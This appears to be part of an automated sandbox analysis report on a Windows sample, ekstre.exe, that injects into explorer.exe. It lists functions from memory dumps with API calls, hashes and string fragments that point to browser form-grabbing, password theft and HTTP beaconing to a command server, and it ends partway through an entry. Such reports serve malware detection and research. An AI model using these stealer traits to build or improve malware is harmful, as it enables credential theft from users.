Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ekstre.exePID: 3348, Parent PID: 1600COMMON

Non-executed Functions

Function 36906690 Relevance: 5.2, Strings: 4, Instructions: 201COMMON

Download Yara Rule

Strings

5, xrefs: 3690677B
C, xrefs: 36906817
), xrefs: 369066AB
5, xrefs: 36906727

Memory Dump Source

Source File: 00000002.00000003.1164868614.0000000036905000.00000004.00000020.00020000.00000000.sdmp, Offset: 36905000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_36905000_ekstre.jbxd

Similarity

API ID:
String ID: )$5$5$C
API String ID: 0-561528185
Opcode ID: cc8a01b57c06fae949896e600092f2861118baca5dc9da18b744037d846b30a6
Instruction ID: 7e6310f5fad3e59edad57a984343ec36cbb260e06128bc19787ab8e01c7af0cb
Opcode Fuzzy Hash: cc8a01b57c06fae949896e600092f2861118baca5dc9da18b744037d846b30a6
Instruction Fuzzy Hash: C0915B5250E3C14EF31357388C68B927FA05F17268F5E46DED4D08A8E3D3AA455AC362

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 4744, Parent PID: 3348COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.5%
Total number of Nodes:	456
Total number of Limit Nodes:	31

Executed Functions

Function 0A7D5F82 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0A7D612E
SleepEx.KERNEL32 ref: 0A7D675B
setsockopt.WS2_32 ref: 0A7D6830
recv.WS2_32 ref: 0A7D6859
recv.WS2_32 ref: 0A7D6899

Strings

ose, xrefs: 0A7D633F
dat=, xrefs: 0A7D6290
tion, xrefs: 0A7D6331
&sql, xrefs: 0A7D6471
Co, xrefs: 0A7D6323
&br=, xrefs: 0A7D6509
&un=, xrefs: 0A7D64F1
: cl, xrefs: 0A7D6338
nnec, xrefs: 0A7D632A
GET , xrefs: 0A7D6318

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: recv$Sleepgetaddrinfosetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 878647675-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: d5e38bd2a713437384ad759d4b75cbb59147ec068b079e5f9a7ba57c19c83aa1
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 5A528030624A488FCB69EF68C4887E9B7F1FB54300F50862ED49FD7166EE30A549CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D5232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0A7D5449

Strings

`, xrefs: 0A7D541D

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 33d0f017621e9170cedd8d98e2d78b6bb65d4abc2df7775090670a4375369985
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 89224C70A28B099FCB99DF68C4986AAF7F1FB98305F41422ED45ED3260DB30E455CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D6E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0A7D6E67

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 1d8edbcb23feb14fdc2fc630ad22c593e528e91b4b5a790ffa16169009b2514a
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: F901B130628B484F8B88EF6CD48412AB7E4FBCD315F000B3EE99AC3250EB70C5454742

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D6E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0A7D6E67

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: db43b74b8f4a3e09c5682c98f22a8140c18fe6ec66ffd4a002c763e0fe3fa783
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: BC01A234628B884B8B88EF6C94452A6B3E5FBCE314F004B3EE9DAC3251DB31D5064782

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D08C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0A7D09A0

Strings

urlmon.dll, xrefs: 0A7D0959
User-Agent: , xrefs: 0A7D0935, 0A7D0948
on.d, xrefs: 0A7D0902
nt: , xrefs: 0A7D091E

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: bd61cd8902d0497b312d36f64ce83d6689e1e98931a5b27f40a19094841687cc
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 8431D131614A0C8BCF45EFA8C8887EEBBF0FB58215F40422AD44EE7251DF748649C789

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D08BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0A7D09A0

Strings

urlmon.dll, xrefs: 0A7D0959
User-Agent: , xrefs: 0A7D0935, 0A7D0948
on.d, xrefs: 0A7D0902
nt: , xrefs: 0A7D091E

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: f77afafdca16373ad2341bfcb1034317585004bbf5746d25a9b5b72080d9e510
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: F221E670610A0C8BCF05EFA8C8887EDBBF0FF58215F40822AD45AE7251DF748609CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0A7CCB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0A7CCCCA

Strings

kern, xrefs: 0A7CCB99
.dll, xrefs: 0A7CCBCD
el32, xrefs: 0A7CCBA0

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 9597d92af0644f723ff369f2b2f1f4e545990ecf676831ac85ce11f65c4ced19
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: B2414D71918A088FDB55EFA8C4987AD77F0FB58300F44427ED84EDB266EE309949CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A7CCB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0A7CCCCA

Strings

kern, xrefs: 0A7CCB99
.dll, xrefs: 0A7CCBCD
el32, xrefs: 0A7CCBA0

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 74093948c51cfe3bb3e4565292e18de70e9d606602011bfee9fad242e1069504
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: BD412C71918A088FDB94EFA8C4987AD77F0FB58300F44417AC84EDB266DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D272E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0A7D2791

Strings

ect, xrefs: 0A7D2761
conn, xrefs: 0A7D275A

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 0dd97960b4bd71692167a97513d33a2e05f8322be8c37387f7ce25af4ca31207
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 78015E70618B1C8FCB94EF5CE088B55B7E0FB58324F1545AED90DCB226CA74C8858BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D2732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0A7D2791

Strings

ect, xrefs: 0A7D2761
conn, xrefs: 0A7D275A

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: b83dbc02ed39f2ddde83285deecc9b820a9d7dd47f8b490bb99a7ca8e94d919c
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: E4012170618A1C8FCB94EF5CE048B55B7E0FB59325F1541AED90DCB226CA74C9858BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D26B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0A7D2713

Strings

send, xrefs: 0A7D26DA

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 4db4f63e8a3790c754d33c38a5a2f1f5de83e2d77d1bdf7b56014ea0e264e45c
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: B1015270518A088FCBC4EF1CD048B2577E0FB58314F1541AED85DCB266C670D8858B81

Uniqueness

Uniqueness Score: -1.00%

Function 0A7D25B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0A7D2611

Strings

sock, xrefs: 0A7D25D9

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 685336753192b4c54b6b5632c3230b284ccb198f6e15bffe5437a5d665176ad1
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 8B0121706186188FCB84EF5CD048B54BBE0FB59314F1545ADE45EDB276C7B0C9858B86

Uniqueness

Uniqueness Score: -1.00%

Function 0A7CA2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0A7CA32D

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 8f72ff184fc64df3c9caab0f6759103beac3035224ea544e548cadf1d32a14ed
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 7B316B70614B0DDFDB64EF2980982A5BBA6FB44342F45827EC92DCA107DB349498CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0A7CA412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0A7CA461

Memory Dump Source

Source File: 00000003.00000002.5855696363.000000000A7C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a7c0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 5c7b00926add2382bd94950a06ef32b9cc33390e72f85d55a7b5a85a53a5fb43
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 92F0F630268A4C4FDB88EF2CD44563AF3E0FBE8215F45463EE54DC3265DA39C5818716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 121AED02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

net., xrefs: 121AEF44
.dll, xrefs: 121AEF2F
M, xrefs: 121AF082
S, xrefs: 121AF073
kern, xrefs: 121AEF5A
wini, xrefs: 121AEF72
ll, xrefs: 121AEF13
dll, xrefs: 121AEF4C
user, xrefs: 121AEF03
32.d, xrefs: 121AEF0B
el32, xrefs: 121AEF27

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 32962b05f2a78c165cd461db1302650484fda339462c1ab3e2f380d246f17600
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 3AE14679618B488FC7A8DF68C4947AAB7F0FF58300F504A2E959BC7251DF30A545CB89

Uniqueness

Uniqueness Score: -1.00%

Function 121B1792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 121B18D2
Subm, xrefs: 121B1855
user, xrefs: 121B1876
guid, xrefs: 121B17CE
ypte, xrefs: 121B18DA
e, xrefs: 121B18BD
form, xrefs: 121B184D
swor, xrefs: 121B18EA
name, xrefs: 121B187D
Fiel, xrefs: 121B1884
dPas, xrefs: 121B18E2
dUse, xrefs: 121B18AD
itUR, xrefs: 121B185D
ypte, xrefs: 121B18A5
encr, xrefs: 121B189D
d, xrefs: 121B18F2
rnam, xrefs: 121B18B5

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: d28ee02729344e62f8797f1949532e4471fa41ec2e472dfd923df915bd85aa13
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 5FB17A31518B488EDB59EF68C489AEEB7F2FF98300F50451ED49AC7261EF70A505CB86

Uniqueness

Uniqueness Score: -1.00%

Function 121AF622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 121AF66D
l, xrefs: 121AF682
p, xrefs: 121AF690
l, xrefs: 121AF6AC
2, xrefs: 121AF674
i, xrefs: 121AF69E
l, xrefs: 121AF6D6
d, xrefs: 121AF67B
u, xrefs: 121AF661
t, xrefs: 121AF6C8
d, xrefs: 121AF6A5
c, xrefs: 121AF697
n, xrefs: 121AF6BA
d, xrefs: 121AF6CF
s, xrefs: 121AF689
w, xrefs: 121AF6B3
n, xrefs: 121AF6C1

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: f2f3784162a9ec625f119f965897f540da1c2be84211cd397dcdaf0b508c0e2f
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 9D41D075A18B48CFDB14DF88A4596BE7BE2FB88704F00025ED809D3281DBB5AD45CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 121B6AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

], xrefs: 121B6C3D
], xrefs: 121B6CA8
l, xrefs: 121B6C35
c, xrefs: 121B6C0B
[, xrefs: 121B6BF6
e, xrefs: 121B6CA0
[, xrefs: 121B6CCD
[, xrefs: 121B6C2D
b, xrefs: 121B6C73
[, xrefs: 121B6C66
[, xrefs: 121B6C90
n, xrefs: 121B6C98
D, xrefs: 121B6CDA
l, xrefs: 121B6CE2

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: c42bc02daa0e24838fa25f60f2308866a713fafcfe2c7bdac003e0f40be76cea
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: E5C14976218A498FC758EF28C495AEAF3F1FF98304F50462AD59AC7210DF30E615CB86

Uniqueness

Uniqueness Score: -1.00%

Function 121B6F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 121B6FB8
r, xrefs: 121B6FA0
r, xrefs: 121B6F98
r, xrefs: 121B6FC0
n, xrefs: 121B6F6B
0, xrefs: 121B6F5B
c, xrefs: 121B6FC8
r, xrefs: 121B6FA8
r, xrefs: 121B6F90
., xrefs: 121B6F63
r, xrefs: 121B6F88
r, xrefs: 121B6FB0

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 4dd8d2ddd78c8ccc5e33c1970d048039ad9d1c29504a50bea789e12b11b4f8a0
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 6451B1325587488FD749CF18C8816AAB7F5FF85704F541A2EE8CB87241DBB4A506CB82

Uniqueness

Uniqueness Score: -1.00%

Function 121B02F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 121B0320
nspr, xrefs: 121B04D4
opera_browser.dll, xrefs: 121B0629
l, xrefs: 121B04E2
dll, xrefs: 121B032E
cli., xrefs: 121B0327
4.dl, xrefs: 121B04DB
dragon_s.dll, xrefs: 121B0614

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 3be94f995abc27ed831d50dcee6a94e835c0bc3c5daaa136021db8f7df0c1be9
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: A6C17D76658A198FC798EF68D495ABAB3F1FF98304F514229D44EC7250DF30AA02CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 121B02F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 121B0320
nspr, xrefs: 121B04D4
opera_browser.dll, xrefs: 121B0629
l, xrefs: 121B04E2
dll, xrefs: 121B032E
cli., xrefs: 121B0327
4.dl, xrefs: 121B04DB
dragon_s.dll, xrefs: 121B0614

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: c3b07e25aa41a2efc8a8a7bd708d883a0bee207e701436fe06e448406b59a1cb
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 5FC17D76658A198FC798EF689495AFAB3F1FF98304F514229D44EC7250DF30AA02CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 121B1CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

2, xrefs: 121B1DE1
Pass, xrefs: 121B1D97
L: , xrefs: 121B1D66
word, xrefs: 121B1D9E
User, xrefs: 121B1DAB
UR, xrefs: 121B1D5F
name, xrefs: 121B1DB2

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 3db8057598dbf9a0788fceabe4f24b440eca3e91fc851a3e45dbe36edaee24bf
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: A5A1AD716187488FDB19DFA89444BEEB7F2FF88300F40462EE48AD7251EB709546CB89

Uniqueness

Uniqueness Score: -1.00%

Function 121B1CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

2, xrefs: 121B1DE1
Pass, xrefs: 121B1D97
L: , xrefs: 121B1D66
word, xrefs: 121B1D9E
User, xrefs: 121B1DAB
UR, xrefs: 121B1D5F
name, xrefs: 121B1DB2

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 03472f15167ce3123df06c530c12b564b9c225e5f5861b3763733696db238f9f
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 43918D716187488FDB19DFA89444BEEB7F2FF98300F40462EE48AD7251EB70954ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 121B1352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

